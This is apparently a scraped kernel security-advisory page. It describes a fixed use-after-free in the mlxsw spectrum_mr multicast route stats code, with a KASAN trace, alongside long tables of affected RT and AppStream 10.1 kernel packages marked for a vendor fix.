| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats Cited commit added a dedicated mutex (instead of RTNL) to protect the multicast route list, so that it will not change while the driver periodically traverses it in order to update the kernel about multicast route stats that were queried from the device. One instance of list entry deletion (during route replace) was missed and it can result in a use-after-free [1]. Fix by acquiring the mutex before deleting the entry from the list and releasing it afterwards. [1] BUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum] Read of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043 CPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full) Hardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017 Workqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum] Call Trace: <TASK> dump_stack_lvl+0xba/0x110 print_report+0x174/0x4f5 kasan_report+0xdf/0x110 mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum] process_one_work+0x9cc/0x18e0 worker_thread+0x5df/0xe40 kthread+0x3b8/0x730 ret_from_fork+0x3e9/0x560 ret_from_fork_asm+0x1a/0x30 </TASK> Allocated by task 29933: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 __kasan_kmalloc+0x8f/0xa0 mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum] mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum] process_one_work+0x9cc/0x18e0 worker_thread+0x5df/0xe40 kthread+0x3b8/0x730 ret_from_fork+0x3e9/0x560 ret_from_fork_asm+0x1a/0x30 Freed by task 29933: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 __kasan_save_free_info+0x3b/0x70 __kasan_slab_free+0x43/0x70 kfree+0x14e/0x700 mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum] mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum] process_one_work+0x9cc/0x18e0 worker_thread+0x5df/0xe40 kthread+0x3b8/0x730 ret_from_fork+0x3e9/0x560 ret_from_fork_asm+0x1a/0x30
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
